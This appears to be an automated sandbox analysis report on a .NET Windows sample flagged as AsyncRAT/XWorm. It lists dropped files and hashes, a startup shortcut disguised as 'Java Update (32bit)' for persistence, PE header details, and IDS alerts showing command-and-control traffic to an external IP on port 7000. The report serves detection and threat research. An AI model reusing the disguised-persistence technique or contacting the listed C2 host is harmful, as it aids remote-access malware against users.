	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	K98766700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	phost.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1

Process:	C:\Users\user\Desktop\03VPFXH490.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.587183654800141
Encrypted:	false
SSDEEP:	768:iZzGU8kyq5bzbTfFN8WuFZ4tJF5PC9O9dU68OMhE3/aZg:uzf95/b7r898Fc9UdU68OMSN
MD5:	F9A6811D7A9D5E06D73A68FC729CE66C
SHA1:	C882143D5FDE4B2E7EDB5A9ACCB534BA17D754EF
SHA-256:	C583D0A367ECFFA74B82B78116BBB04B7C92BED0300ED1C3ADC4EF3250FBB9CC
SHA-512:	4DEC52F0D1927306DEDA677FEA46D103B052AAA5F7D7F49ABE59A3618110EE542C2DB385158A393970751FCC9687EFE44A860D6330ED474C0C849369C0DA56DF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Java Update (32bit).exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Java Update (32bit).exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Java Update (32bit).exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Java Update (32bit).exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kL"g................................. ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......\|]...Y............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\03VPFXH490.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jv2nk3n.zwd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxycjfj5.k3i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eknntanq.aiv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbdjcexy.t51.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdspceyt.x4w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcs4nxfe.ays.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ls3yxuqy.1a5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3jqmq4g.jsa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3olfhyy.pnp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdvlpoku.m0i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qu30xmho.apw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r02wjfm5.j1h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj5kd1ja.vaq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzsungfz.m1s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdipgmig.n3z.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0xe4d1u.0ul.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

Download File

Process:	C:\Users\user\Desktop\03VPFXH490.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 13 15:45:53 2024, mtime=Fri Dec 13 15:45:53 2024, atime=Fri Dec 13 15:45:53 2024, length=41472, window=hide
Category:	dropped
Size (bytes):	725
Entropy (8bit):	4.639949674281885
Encrypted:	false
SSDEEP:	12:83HtCRcIz4Nke1olCjEjAjUilBdPb/xv5R5ZBmV:83HUWUAVBF5xfZBm
MD5:	3DD20234A615F87DC946EF405CA5CA14
SHA1:	B2A38636FDB8E6B51777C533B6DF1766019E065D
SHA-256:	30C2CC28D874C17F1DDCF528C09B2AD1D02B393281FCA1A181F4C9A5AE620A3E
SHA-512:	C7F94FF615633488E5869A35EE6DDDBCE9C735435CA7EAB97ED5199F233AC4648584127F5EEE3DE31222E5D652ED443ACF465FF72C29F973611D05DE64ADA942
Malicious:	false
Preview:	L..................F.... ....my~M....my~M....my~M...............................P.O. .:i.....+00.../C:\...................`.1......Y... PROGRA~3..H......O.I.Y......g.....................w5..P.r.o.g.r.a.m.D.a.t.a.....\|.2......Y.. JAVAUP~1.EXE..`......Y...Y......&.....................H.<.J.a.v.a. .U.p.d.a.t.e. .(.3.2.b.i.t.)...e.x.e.......U...............-.......T...........x........C:\ProgramData\Java Update (32bit).exe..>.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.J.a.v.a. .U.p.d.a.t.e. .(.3.2.b.i.t.)...e.x.e.`.......X.......855271...........hT..CrF.f4... ....q....,.......hT..CrF.f4... ....q....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.587183654800141
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	03VPFXH490.exe
File size:	41'472 bytes
MD5:	f9a6811d7a9d5e06d73a68fc729ce66c
SHA1:	c882143d5fde4b2e7edb5a9accb534ba17d754ef
SHA256:	c583d0a367ecffa74b82b78116bbb04b7c92bed0300ed1c3adc4ef3250fbb9cc
SHA512:	4dec52f0d1927306deda677fea46d103b052aaa5f7d7f49abe59a3618110ee542c2db385158a393970751fcc9687efe44a860d6330ed474c0c849369c0da56df
SSDEEP:	768:iZzGU8kyq5bzbTfFN8WuFZ4tJF5PC9O9dU68OMhE3/aZg:uzf95/b7r898Fc9UdU68OMSN
TLSH:	1A135B4477D44626E5FEABF929B3A6030770E6034913DB5E0CD8869B2B37BC48B117D6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kL"g................................. ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40b7be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67224C6B [Wed Oct 30 15:10:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb770	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x4c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x97c4	0x9800	d252ebc7d6d896c83382a89f7593b56c	False	0.4929327713815789	data	5.707890843476401	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x4c0	0x600	e273c8a0d52f54a66fe6cb494c8d9bcb	False	0.37109375	data	3.675191781514014	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	57d018d321f2cb5a5b79ad9364b592fe	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc0a0	0x22c	data			0.4766187050359712
RT_MANIFEST	0xc2d0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T17:45:56.562516+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:00.823486+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:00.823486+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:01.474616+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:06.474257+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:07.663515+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:46:08.743008+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:08.774353+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:46:11.491415+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:16.516874+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:21.547241+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:21.548935+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:46:21.952041+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:26.671858+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:30.889531+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:30.889531+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:31.532464+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:34.549061+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:34.550780+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49737	45.141.26.234	7000	TCP
